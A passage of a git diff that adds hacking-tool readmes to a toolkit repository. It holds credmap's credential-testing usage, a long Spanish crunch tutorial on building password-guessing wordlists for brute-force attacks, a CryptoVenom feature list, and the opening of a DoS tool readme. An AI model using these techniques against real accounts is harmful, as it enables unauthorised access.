"socks5://192.168.1.2:9050") + --list list available sites to test with + +### Examples + ./credmap.py --username janedoe --email janedoe@email.com + ./credmap.py -u johndoe -e johndoe@email.com --exclude "github.com, live.com" + ./credmap.py -u johndoe -p abc123 -vvv --only "linkedin.com, facebook.com" + ./credmap.py -e janedoe@example.com --verbose --proxy "https://127.0.0.1:8080" + ./credmap.py --load creds.txt --format "e.u.p" + ./credmap.py -l creds.txt -f "u|e:p" + ./credmap.py -l creds.txt + ./credmap.py --list + + +### Add new websites +Adding new websites to be tested using credmap can be done by creating a new XML file in the websites/ folder. To view a list of all possible tags that can be used in the XML file, please refer to the [Wiki](https://github.com/lightos/credmap/wiki). + +### Docker +Build and deploy with the following: +```bash +git clone https://github.com/lightos/credmap.git +cd credmap +docker build -t credmap . +docker run -it credmap +``` \ No newline at end of file diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md new file mode 100755 index 00000000..398cfc5c --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/crunch.md @@ -0,0 +1,722 @@ +Saludos mis futuros hackers + +En el mundo del hacking tenemos una técnica llamada fuerza bruta, bien vista por algunos y mal vista por otros, pero no es este el lugar de debatir sobre la calidad de la técnica, pues según wikipedia la fuerza bruta es: + +"La forma de recuperar una clave probando todas las combinaciones posibles hasta encontrar aquella que permite el acceso." + +Muy bien, para orquestar este tipo de ataque necesitaremos un archivo que contenga dentro de si, cientos, miles e incluso millones de palabras para ir probando 1 por 1 hasta dar con el valido, estos archivos en buen español se llaman diccionarios y los gringos para que nadie se confunda les dicen wordlists (listas de palabras). 
+ +Ahora quiero que se imaginen que tengamos que crear un diccionario escribiendo todas las posibles palabras 1 por 1, no tendría sentido y tampoco sería práctico, así que existen programas que generan diccionarios automáticamente simplemente especificando algunos parámetros de entrada, entre esos programas podrían decirse que el más conocido es Crunch, una aplicación sin interfaz gráfica que tiene una gran flexibilidad al momento de generar diccionarios/wordlists, existe mucha documentación sobre el mismo, pero generalmente se explican 1 ó 2 ejemplos sobre su uso, dejando al usuario descubrir el resto, pues aqui en fb.me/Ivam3byCinderella les vamos a regalar un manual completo con todas las opciones y usos prácticos para que no quede duda alguna, esto sera algo asi como un curso intensivo de Crunch, asi que como el conocimiento es libre vamos a compartirlo. + + +QUE ES CRUNCH + +Crunch es un programa que basandose en criterios establecidos por el usuario (input) es capaz de generar diccionarios para ser usados en fuerza bruta (output), el resultado de Crunch puede ser visto en pantalla, puede ser guardado en un archivo .txt ó puede enviarse a otro programa en tiempo real para su uso. + +La version 1.0 fue creada por mima_yin y todas las versiones posteriores fueron actualizadas y desarrolladas por bofh28. A ellos todo el agradecimiento y el respeto por tan maravillosa herramienta. + + +COMO INSTALAR CRUNCH + +LINUX + +Pues en cualquier distro Linux bastaria con tirar de la terminal y escribir: + +$sudo apt-get install crunch + +Dependiendo de la distribución podríamos tener uno que otro gestor de paquetes, así que cada cual podría modificar el comando de acuerdo a sus sistemas (yum, pacman, aptitude, etc..) 
+ +Imaginando que no este en los repositorios de software podriamos bajarnos el tarball e instalar nosotros mismos: + +$git clone http://git.code.sf.net/p/crunch-wordlist/code crunch-wordlist-code +$cd crunch-wordlist-code; +$sudo make && sudo make install; + +Termux + +Pues el creador no ha liberado una version oficial para los usuarios de Termux, pero venga que aqui llega la magia del software open-source, y es que un usuario, mejor dicho una usuaria (maripuri) ha compilado la version 3.2 de crunch para Android, asi que a ella muchas gracias por su esfuerzo y trabajo, y yo Ivam3 se los pongo a disposición de los interesados así que pueden bajarse el fichero desde aqui: + +LINK ---- https://github.com/ivam3/crunch-4tmux + +Primero clonaremos el repositorio. +Ejemplo: $git clone https://github.com/ivam3/crunch-4tmux + +Despues entramos a la carpeta clonada. +Ejemplo: $cd crunch-4tmux + +Posteriormente le damos los permisos requeridos al archivo ejecutable. +Ejemplo: $chmod 777 crunch + +Y por último copiamos el archio crunch a nuestra carpeta de binarios. +Ejemplo: $cp crunch /data/data/com.termux/files/usr/bin + +LISTO!! ya puedes ejecutar crunch desde cualquier ubicacin que te encuentres. + + + +COMO USAR CRUNCH NIVEL 1 + +Muy bien mis futuros hackers ha llegado el momento de la verdad, ha llegado el momento de desnudar esta maravillosa herramienta y poder hacer uso de ella de una forma eficiente, a continuacion veremos su uso, desde la ejecución mas sencilla hasta la más compleja. + +Bastaria con escribir "crunch" en una terminal para desplegar su menú de ayuda; donde podemos ver claramente la forma sencilla en que podemos hacer uso de ella: + +$crunch + +crunch version 3.6 + +Crunch can create a wordlist based on criteria you specify. The outout from crunch can be sent to the screen, file, or to another program. + +Usage: crunch [options] +where min and max are numbers + +Please refer to the man page for instructions and examples on how to use crunch. 
+ +where min and max are numbers + +Es tan sencillo como decirle la cantidad de caracteres que estamos buscando seguido de alguna opcion, vamos a lanzarlo de una forma basica a ver que tal, probemos con generar todas las posibles combinaciones para una palabra de 4 caracteres: + +$crunch 4 4 + +Como se aprecia crunch avisa de una froma muy educada cuantas lineas seran generadas y cuanto espacio ocupara, a continuacion les comparto las primeras lineas de la salida en pantalla: + +aaaa +aaab +aaac +aaad +aaae +aaaf +aaag +aaah +aaai +aaaj +aaak +aaal +aaam +aaan +aaao +aaap +aaaq +aaar +aaas +aaat +aaau +aaav +aaaw +aaax +aaay +aaaz +aaba +aabb +aabc +aabd +aabe +aabf +aabg +aabh +aabi +aabj +aabk +aabl +aabm +aabn +aabo +aabp +aabq +aabr +aabs +aabt +aabu +aabv +aabw +aabx + +Vamos a analizar esto unos segundos... + +Tenemos que crunch ha generado todas las posibles combinaciones para una palabra de 4 caracteres, pero notan alguna particularidad? + +No se han usado números, símbolos, mayúsculas ni espacios en blanco. La razón se explica a continuación: + +Crunch utiliza una variable llamada charset (character setting) y es como el conjunto de caracteres que serán usados para la generación del diccionario/wordlist, por defecto el charset es lalpha (lower alphabet) pero que tal si probamos a configurar otro charset. + +$crunch 4 4 -f .charset.lst numeric + +Como siempre, al presionar enter crunch nos indicara cuantas lineas y cuanto espacio sera usado, analicemos las primeras lineas: + +0000 +0001 +0002 +0003 +0004 +0005 +0006 +0007 +0008 +0009 +0010 +0011 +0012 +0013 +0014 +0015 +0016 +0017 +0018 +0019 +0020 +0021 +0022 +0023 +0024 +0025 +0026 +0027 +0028 +0029 +0030 +0031 +0032 +0033 +0034 +0035 +0036 +0037 +0038 +0039 +0040 +0041 +0042 +0043 +0044 +0045 +0046 +0047 +0048 +0049 + +Todo ha ido bien, pero ahora notamos una pequeña diferencia, y es que solo ha generado números, pero eso es justo lo que queríamos no? 
Y como lo hemos logrado pues con la opción -f y listo!!  + +Esta opción le indica dónde buscar el fichero de variables, es decir, donde están preestablecidas todos los charset, es decir que debemos especificar la ruta al archivo así como nuestra selección dentro del mismo, en mi caso tengo el charset.lst en mi directorio home, por ello no específico ruta hasta el mismo.  + +Cuantos charset podemos elegir además de lalpha y de numeric? + +Miren por ustedes mismo + +hex-lower                     = [0123456789abcdef] +hex-upper                     = [0123456789ABCDEF] + +numeric                       = [0123456789] +numeric-space                 = [0123456789 ] + +symbols14                     = [!@#$%^&*()-_+=] +symbols14-space               = [!@#$%^&*()-_+= ] + +symbols-all                   = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +symbols-all-space             = [!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +ualpha                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZ] +ualpha-space                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZ ] +ualpha-numeric                = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] +ualpha-numeric-space          = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] +ualpha-numeric-symbol14       = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=] +ualpha-numeric-symbol14-space = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] +ualpha-numeric-all            = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +ualpha-numeric-all-space      = [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +lalpha                        = [abcdefghijklmnopqrstuvwxyz] +lalpha-space                  = [abcdefghijklmnopqrstuvwxyz ] +lalpha-numeric                = [abcdefghijklmnopqrstuvwxyz0123456789] +lalpha-numeric-space          = [abcdefghijklmnopqrstuvwxyz0123456789 ] +lalpha-numeric-symbol14       = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=] +lalpha-numeric-symbol14-space = 
[abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+= ] +lalpha-numeric-all        = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] +lalpha-numeric-all-space      = [abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +mixalpha                   = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ] + +mixalpha-space             = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ] + +mixalpha-numeric           = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789] + +mixalpha-numeric-space     = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ] + +mixalpha-numeric-symbol14  = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=] + +mixalpha-numeric-symbol14-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= ] + +mixalpha-numeric-all       = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +mixalpha-numeric-all-space = [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################## +# Higercase             # +######################### +ualpha-sv                        = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ] + +ualpha-space-sv                  = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ] + +ualpha-numeric-sv                = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789] + +ualpha-numeric-space-sv          = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ] + +ualpha-numeric-symbol14-sv       = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=] + +ualpha-numeric-symbol14-space-sv = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ] + +ualpha-numeric-all-sv            = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +ualpha-numeric-all-space-sv      = [ABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################### +# Lowercase             # +######################### 
+lalpha-sv                        = [abcdefghijklmnopqrstuvwxyzåäö] + +lalpha-space-sv                  = [abcdefghijklmnopqrstuvwxyzåäö ] + +lalpha-numeric-sv                = [abcdefghijklmnopqrstuvwxyzåäö0123456789] + +lalpha-numeric-space-sv          = [abcdefghijklmnopqrstuvwxyzåäö0123456789 ] + +lalpha-numeric-symbol14-sv       = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=] + +lalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+= ] + +lalpha-numeric-all-sv            = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +lalpha-numeric-all-space-sv      = [abcdefghijklmnopqrstuvwxyzåäö0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + +######################### +# Mixcase               # +######################### +mixalpha-sv                   = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ] + +mixalpha-space-sv             = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ ] + +mixalpha-numeric-sv           = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789] + +mixalpha-numeric-space-sv     = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789 ] + +mixalpha-numeric-symbol14-sv  = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=] + +mixalpha-numeric-symbol14-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+= ] + +mixalpha-numeric-all-sv       = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/] + +mixalpha-numeric-all-space-sv = [abcdefghijklmnopqrstuvwxyzåäöABCDEFGHIJKLMNOPQRSTUVWXYZÅÄÖ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ ] + + +Si no quieren especificar ningun charset pueden simplemente pasarle a crunch cuales caracteres desean usar en la generacion, por ejemplo: + +$crunch 4 4 ab12 + +Y la salida seria: + +aaaa +aaab +aaa1 +aaa2 +aaba +aabb +aab1 +aab2 +aa1a +aa1b +aa11 +aa12 +aa2a +aa2b 
+aa21 +aa22 +abaa +abab +aba1 +aba2 +abba +abbb +abb1 +abb2 +ab1a +ab1b +ab11 +ab12 +ab2a +ab2b +ab21 +ab22 +a1aa +a1ab +a1a1 +a1a2 +a1ba +a1bb +a1b1 +a1b2 +a11a +a11b +a111 +a112 +a12a +a12b +a121 +a122 +a2aa +a2ab +a2a1 +a2a2 +a2ba +a2bb +a2b1 +a2b2 +a21a +a21b +a211 +a212 +a22a +a22b +a221 +a222 +baaa +baab +baa1 +baa2 +baba + +Empiezan a entender el sentido de la palabra "Flexibilidad" para referirse a crunch, bueno sigamos adelante aprendiendo más trucos para esta maravillosa tool. + + +CÓMO USAR CRUNCH NIVEL 2 + +Hasta ahora hemos aprendido a usar crunch al nivel basico, es decir solo sabemos generar diccionarios especificandole el tamaño y el conjunto de caracteres a usarse, y muchos pensaran que esa es toda la magia de generar diccionarios y la verdad es que esta cortos, siganme y veremos que otras cosas podemos hacer. + +Recuerdan aquella película de hackers en la que el estelar mira el teclado del administrador de sistemas y logra ver la clave digitada en el teclado? Pues en la vida real quizás no sea tan sencillo ver toda la clave digitada y solo logramos recordar parte de la misma y quizás su tamaño (si su tamaño, yo suelo contar las pulsaciones en el teclado asi me hago una idea del tamaño) pues supongamos que queremos generar una clave que inicia con "Und......" 
pero no sabemos el resto, pues podríamos decirle a crunch: + +$crunch 9 9 -t und@@@@@@ + +Y esto generara: + +undaaoerv +undaaoerw +undaaoerx +undaaoery +undaaoerz +undaaoesa +undaaoesb +undaaoesc +undaaoesd +undaaoese +undaaoesf +undaaoesg +undaaoesh +undaaoesi +undaaoesj +undaaoesk +undaaoesl +undaaoesm +undaaoesn +undaaoeso +undaaoesp +undaaoesq +undaaoesr +undaaoess +undaaoest +undaaoesu +undaaoesv +undaaoesw +undaaoesx +undaaoesy +undaaoesz +undaaoeta +undaaoetb +undaaoetc +undaaoetd +undaaoete +undaaoetf +undaaoetg +undaaoeth +undaaoeti +undaaoetj +undaaoetk +undaaoetl +undaaoetm +undaaoetn +undaaoeto +undaaoetp +undaaoetq +undaaoetr +undaaoets +undaaoett +undaaoetu +undaaoetv +undaaoetw +undaaoetx +undaaoety +undaaoetz +undaaoeua +undaaoeub +undaaoeuc +undaaoeud +undaaoeue +undaaoeuf +undaaoeug +undaaoeuh +undaaoeui +undaaoeuj +undaaoeuk +undaaoeul +undaaoeum +undaaoeun +undaaoeuo +undaaoeup +undaaoeuq +undaaoeur +undaaoeus +undaaoeut +undaaoeuu +undaaoeuv +undaaoeuw +undaaoeux +undaaoeuy +undaaoeuz +undaaoeva +undaaoevb +undaaoevc +undaaoevd +undaaoeve +undaaoevf +undaaoevg +undaaoevh + +Y si nos fijamos crunh ha generado palabras sin modificar los 3 primeros caracteres, con lo cual si la palabra clave es "undercode" eventualmente sera generada, pero que pasaria si el admin del sitio ha querido complicarla y ha puesto "underc0de" como password? 
pues podemos hacerlo de dos formas, una sencilla y otra un poco mas compleja, para la forma compleja podriamos hacerlo al especificar un charset alfanumerico escribiendo: + +$crunch 9 9 -f .charset.lst lalpha-numeric -t und@@@@@@ + +ó bien podriamos especificar los caracteres que queremos usar: + +$crunch 9 9 abcefghijklmnopqrstuwxyz1234567890 -t und@@@@@@ + +Con ambos comandos tendriamos el mismo resultado, simplemente son dos formas de hacer lo mismo + +undaaaz1u +undaaaz1v +undaaaz1w +undaaaz1x +undaaaz1y +undaaaz1z +undaaaz10 +undaaaz11 +undaaaz12 +undaaaz13 +undaaaz14 +undaaaz15 +undaaaz16 +undaaaz17 +undaaaz18 +undaaaz19 +undaaaz2a +undaaaz2b +undaaaz2c +undaaaz2d +undaaaz2e +undaaaz2f +undaaaz2g +undaaaz2h +undaaaz2i +undaaaz2j +undaaaz2k +undaaaz2l +undaaaz2m +undaaaz2n +undaaaz2o +undaaaz2p +undaaaz2q +undaaaz2r +undaaaz2s +undaaaz2t +undaaaz2u +undaaaz2v +undaaaz2w +undaaaz2x +undaaaz2y +undaaaz2z +undaaaz20 +undaaaz21 +undaaaz22 +undaaaz23 +undaaaz24 +undaaaz25 +undaaaz26 +undaaaz27 +undaaaz28 +undaaaz29 +undaaaz3a +undaaaz3b +undaaaz3c +undaaaz3d +undaaaz3e +undaaaz3f +undaaaz3g +undaaaz3h +undaaaz3i +undaaaz3j +undaaaz3k +undaaaz3l +undaaaz3m +undaaaz3n +undaaaz3o +undaaaz3p +undaaaz3q +undaaaz3r +undaaaz3s +undaaaz3t +undaaaz3u +undaaaz3v +undaaaz3w +undaaaz3x +undaaaz3y +undaaaz3z +undaaaz30 +undaaaz31 +undaaaz32 +undaaaz33 +undaaaz34 +undaaaz35 +undaaaz36 +undaaaz37 +undaaaz38 +undaaaz39 +undaaaz4a +undaaaz4b +undaaaz4c +undaaaz4d +undaaaz4e +undaaaz4f +undaaaz4g +undaaaz4h +undaaaz4i +undaaaz4j +undaaaz4k +undaaaz4l +undaaaz4m +undaaaz4n +undaaaz4o +undaaaz4p +undaaaz4q +undaaaz4r +undaaaz4s +undaaaz4t +undaaaz4u +undaaaz4v +und..... 
+ +Ahora viene la forma sencilla que es simplemente cambiar el símbolo "@" por el tipo de carácter que queremos insertar en la generación del diccionario, recuerden que con la opción -t, podemos especificar un patrón de caracteres que serán los únicos en cambiar al generar el diccionario, así los caracteres que podemos especificar para el patrón son: + +              @  insertara minúsculas +              ,    insertara mayúsculas +              %  insertara números +              ^   insertara símbolos + +Sabiendo esto vamos a suponer que queremos generar un diccionario donde la primera letra sea en mayúscula, pero que a lo largo del mismo, tanto el 2do como el 3er caracter se queden fijos, pues para hacerlo agregamos una "," que tal como explique anteriormente insertará mayúsculas, pero recordemos que había un número en el password, asi que tambien necesitamos insertar un solo número en el 7mo carácter de nuestra palabra, pues sólo contamos hasta el lugar número 7 e insertamos un "%" que como también expliqué anteriormente solo inserta números, el comando final quedaría como esto:  + +$crunch 9 9 -t ,nd@@@%@@ + +generando lo siguiente : + +Andaaw2fn +Andaaw2fo +Andaaw2fp +Andaaw2fq +Andaaw2fr +Andaaw2fs +Andaaw2ft +Andaaw2fu +Andaaw2fv +Andaaw2fw +Andaaw2fx +Andaaw2fy +Andaaw2fz +Andaaw2ga +Andaaw2gb +Andaaw2gc +Andaaw2gd +Andaaw2ge +Andaaw2gf +Andaaw2gg +Andaaw2gh +Andas.... + +Todo esta flexibilidad la hemos logrado con la opción -t, espero la hayan entendido y les sea muy práctica en un futuro. 
+ +Veamos, vamos a generar un diccionario concatenando palabras, a imaginarse por cual razón algunas personas usan como password una serie de palabras unidas, por ejemplo alguien que le guste harry potter podría usar los nombres de Harry, Hermione y Ron como password y en ese caso generar simplemente por caracteres sería casi imposible dada la longitud final "harryhermioneron" así que en crunch existe una opción que nos permite concatenar palabras, veamos como: + +$crunch 1 1 -p Harry Hermione Ron + +generando esto: + +HarryHermioneRon +HarryRonHermione +HermioneHarryRon +HermioneRonHarry +RonHarryHermione +RonHermioneHarry + +Como se habran fijado con la opcio -p es posible lograr concatenar palabras, pero hay una particularidad y es que fijense que en la parte donde se especifican la longitud menor y la mayor yo he colocado "1 1" y pues la verdad es que cuando se usa la opcion -p los numeros no son procesados, pero son necesarios para el argumento, es decir que podremos colocar cualquier cosa y sera irrelevante para la salida. + + +CÓMO USAR CRUNCH NINEL 3 + +Pues llegados a este punto ya sabemos generar diccionarios con distintos charset, sabemos aplicar patrones en la generación, concatenar palabras, así como especificar con cuales caracteres queremos generar, así que considero que estamos avanzando en la tarea de desnudar a crunch. + +Al inicio del taller decia que crunch puede mandar los resultados a la pantalla, puede crear un archivo ó pasarle la salida a otro programa (generalmente un crackeador como aircrack) pero hasta ahora solamente hemos sacado los resultados en pantalla, es decir no se han creado ningun archivo ni nada parecido, asi que vamos a ello. + +Enviando el output de crunch a un archivo.txt ó a un comprimido. 
+ +Pues la idea basica de crear un diccionario es poder usarse posteriormente para dar con el hash valido en una prueba de fuerza bruta, asi que de alguna forma debemos poder generar un fichero a partir de la salida, esto es posible usando la opcion -o (output) seguido del nombre del archivo, tomemos como ejemplo el ejercicio de Harry Hermione y Ron y creemos un fichero, el comando seria: + +$crunch 1 1 -o NombresPotter.txt -p Harry Hermione Ron + +Opcionalmente tambien podriamos especificar la ruta donde queremos volcar el diccionario, por ejemplo: + +crunch 1 1 -o /sdcard/diccionarios/NombresPotter.txt -p Harry Hermione Ron + +Vamos a avanzar un poco más profundo y hagamos que cada 5000 líneas crunch nos genero 1 fichero, pues para que, dependiendo el entorno en el que se vaya a auditar necesitamos seccionar el ataque, es decir dividir el diccionario en una cantidad específica, para lograr mejor acoplamiento con los temporizadores de los crackeadores, para lograr esa división de un diccionario en varios ficheros de menor tamaño usamos la opción -c (esta opción solo funciona si el -o START está presente en la linea) por ejemplo: + +crunch 1 1 -o /sdcard/diccionarios/START -c 5000 + +Esto inicia el proceso de crear multiples ficheros con 5000 lineas cada uno. + +Y si me fuera a la carpeta diccionarios me encontraría con diversos archivos en extensión .txt los cuales tendrían un límite de líneas a 5000. + +Ven que sencillo? + +NOTA: + +[].- El START funciona como nombre de archivo para el primer fichero a crear, a partir de ahi los ficheros tomaran el nombre de la ultima linea del archivo anterior + la primera linea del archivo posterior + +[].- Aunque debo aclarar que en algunos caso es posible llenar el disco duro al generar un diccionario, todo depende de lo que le digamos a crunch, por ejemplo si yo dijese: + +$crunch 15 25 -o demasiado.txt +$crunch will now generate approximately the following amount of data: 2744 PB + +Se fijan en el tamaño del fichero? 
+ +2744 PB !!! + +Eso seria demasiado para cualquier disco duro. + +Pero entre tanta generacion que tal si creamos un fichero y lo comprimimos a bzip, de un solo golpe, suena complicado pero seria simplemente agregar la opcion -z seguido del tipo de compresion deseado, por ejemplo: + +$crunch 4 5 -o /sdcard/diccionarios/START -c 5000 -z gzip + +De esta forma se iniciaria el mismo proceso anterior solo que en comprimidos gzip u en cualquier otro formato soportado por crunch (gzip, bzip2, lzma, y 7z ) + +Pues como podran ver no es tan complicado mandar la salida a un fichero txt, gzip, bzip2, lzma ó 7z. + +........ + +Espero le sea útil esta breve pero necesaria explicación. +Recuerden seguirme en: +Canal de YouTube --> www.youtube.com/Ivam3bycinderella +Canal de Telegram -> t.me/Ivam3byCinderella +Bot de Telegram --> t.me/Ivam3_Bot + +Saludos mis queridos futuros hackers, hasta la próxima. diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md new file mode 100755 index 00000000..47e375ea --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/C/cryptovenom.md @@ -0,0 +1,219 @@ +# CryptoVenom +CryptoVenom: The Cryptography Swiss Army knife + +

+ +

+ +# What is CryptoVenom? + + +CryptoVenom is an OpenSource tool which contains a lot of cryptosystems and cryptoanalysis methods all in one, including +classical algorithms, hash algorithms, encoding algorithms, logic gates, mathematical functions, modern symmetric and asymmetric encryptions etc. + + +# What is the Purpose of CryptoVenom? + +Make easier the cryptoanalysis or the usage of cryptosystems and manipulation of them. + +If you are a CTF Player or just a curious student with just learning purposes this is your tool! + + +# Errors? Updates? + +As this is a very big tool, and I created it alone there might be some errors in it, if you get an error, +or some functionality of the tool is not working for you please contact as soon as possible with me through telegram (@LockedByte), email (alejandro.guerrero.rodriguez2@gmail.com) or just open it in gitHub. I'll patch all these errors quickly. + +# Dependencies? Setup? Installing? + +CryptoVenom is JUST working for linux, I tested it just in kali and in Parrot OS, if you are in another dist and you have problems let me know. Installing is a very simple process, just execute as root the setup.py file and dependencies will be installed. 
+ + +# Content + +[+] Classical + + [*] Caesar + [*] Vigenere Cipher + [*] Playfair Cipher + [*] Polybius Square + [*] Morse + [*] Atbash + [*] Baconian + [*] AutoKey + [*] Beaufort Cipher + [*] Railfence Cipher + [*] Simple Substitution Cipher + [*] Columnar Tramposition + [*] Bifid + [*] Foursquare Cipher + [*] Fractionated Morse + [*] Enigma + [*] Gronsfeld Cipher + [*] Porta + [*] RunningKey + [*] ADFGVX Cipher + [*] ADFGX Cipher + [*] Affine Cipher + [*] Vernam Cipher + + +[+] Asymmetric + + [*] RSA + [*] Diffie-Hellman + [*] DSA + [*] ECC (Elliptic Curve Cryptography) + +[+] Symmetric + + [*] AES / Rijndael (Advanced Encryption Algorithm) + [*] DES (Data Encryption Standard) + [*] XOR Cipher + [*] Blowfish + [*] Twofish + [*] 3DES / TDES (Triple DES) + [*] RC2 (Ron's Code 2) + [*] RC4 (Ron's Code 4) + [*] CAST + [*] SCrypt + + +[+] Encoding + + [*] Base16 + [*] Base32 + [*] Base64 + [*] Base58 + [*] Base85 + [*] Base91 + [*] Hexadecimal + [*] Octal + [*] Decimal + [*] Binary + [*] ROT-x + [*] URL Encode/Decode + +[+] Hash + + [*] MD5 + [*] SHA-1 + [*] SHA-224 + [*] SHA-256 + [*] SHA-384 + [*] SHA-512 + [*] MD2 + [*] MD4 + [*] Argon2 + [*] BCrypt + [*] BigCrypt Unix + [*] Blake2b + [*] Blake2s + [*] BSDi Crypt Unix + [*] Cisco ASA Hash + [*] Cisco PIX Hash + [*] Cisco Type 7 + [*] Crypt-16 Unix + [*] DES Crypt Unix + [*] FreeBSD Unix + [*] HMAC + [*] LDAP-MD5 + [*] LDAP Salted MD5 + [*] LDAP SHA-1 + [*] LDAP Salted SHA-1 + [*] LMHash + [*] MD5 Unix + [*] MSDCC Hash + [*] MSDCC 2 Hash + [*] MSSQL 2000 Hash + [*] MSSQL 2005 Hash + [*] MySQL 41 Hash + [*] MySQL 323 Hash + [*] NTHash + [*] NTLM Hash + [*] Oracle 10 Hash + [*] Oracle 11 Hash + [*] PHPass Hash + [*] PostgreSQL MD5 + [*] RIPEMD + [*] SCrypt + [*] SHA-256 Unix + [*] SHA-512 Unix + [*] Sun MD5 Unix + + + +[+] String Manipulation + + [*] Reverse String + [*] Block Reverse String + [*] String To Upper + [*] String To Lower + [*] One-Byte List + [*] Reverse Case + [*] Remove Spaces + [*] Remove Enters + 
[*] String Replacement + [*] Add Line Numbers + + +[+] Mathematical Functions + + [*] Fast Exponentiation Algorithm + [*] Extended Euclidean Algorithm + [*] Factorize Product of two primes + + + +[+] Other + + [*] XOR + [*] AND + [*] NAND + [*] NOT + [*] OR + [*] NOR + [*] XNOR + [*] PGP Operations + + +I'll add more ciphers, cracking systems and functionalities! + + +# Planning-to-add features + +- File Hashing +- Finish Crackssistant +- PGP Operations +- Algorithm Identifiers +- Elliptic Curve Cryptography (ECC) +- ElGamal +- Bruteforcers & crackers against Symmetric algorithms +- More crackers & bruteforcers against Classical Algorithms +- Calculate file entropy +- Key Exchanges with TCP Sockets +- More error handling and "try/excepts" +- More customizable options +- More encodings in hash bruteforcer +- Add HMAC-(hash) for each hash algorithm + +* Please: If you want anything to be added to the tool contact me and I'll add it to the next version! + +# About + +Created By Alejandro Guerrero Rodriguez (LockedByte) + +Twitter: @LockedByte +Telegram: @LockedByte +Email: alejandro.guerrero.rodriguez2@gmail.com + + + + + +Collaborator in testing and error patching purposes: + +Eduardo Perez Malumbres + +Twitter: @blueudp +Telegram: @blueudp diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md new file mode 100755 index 00000000..71c7bef7 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/D/DoS-A-Tool.md @@ -0,0 +1,55 @@ +# DoS-A-Tool v.1.5 + + Denial of Service Attack Tool (DoS-A-Tool) + +A distributed denial-of-service (DDoS) attack is an attack in which multiple compromised computer systems attack a target, such as a server, website or other network resource, and cause a denial of service for users of the targeted resource. 
